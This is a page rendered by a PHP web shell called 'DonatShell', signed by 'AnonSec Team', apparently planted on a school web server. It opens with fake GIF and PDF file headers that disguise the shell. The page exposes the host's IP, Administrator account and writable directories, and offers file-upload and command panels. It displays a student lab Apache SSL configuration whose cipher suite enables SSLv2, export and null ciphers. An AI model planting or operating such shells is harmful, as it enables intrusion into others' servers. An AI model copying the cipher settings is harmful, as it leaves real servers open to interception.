GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/JimMartinson/CST1611/Resources/Week/08/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/JimMartinson/CST1611/Resources/Week/08/08.conf
# 08.conf
# Lab05
LoadModule ssl_module modules/mod_ssl.so
<IfModule ssl_module>
	Listen 443
	AddType application/x-x509-ca-cert .crt
	AddType application/x-pkcs7-crl .crl
	SSLPassPhraseDialog builtin
	SSLSessionCache "shmcb:C/Apache24/logs/ssl_scache(512000)"
	SSLSessionCacheTimeout 300
	SSLRandomSeed startup builtin
	SSLRandomSeed connect builtin
	<FilesMatch "\.(cgi|shtml|phtml|php)$">
		SSLOptions +StdEnvVars
	</FilesMatch>
</IfModule>

<VirtualHost *:443>
	DocumentRoot "C:/CST1611/Week/08"
	ServerName Lab05.test
	ErrorLog logs/Lab05.test.Error.log
	CustomLog logs/Lab05.test.Access.log common
	SSLEngine on
	SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
	SSLCertificateFile "C:/CST1611/Week/08/Lab05.test.crt"
	SSLCertificateKeyFile "C:/CST1611/Week/08/Lab05.test.key"
	<Directory "C:/CST1611/Week/08/">
		Options All +MultiViews
		AllowOverride All
		Require all granted
	</Directory>
</VirtualHost>

Anon7 - 2022
AnonSec Team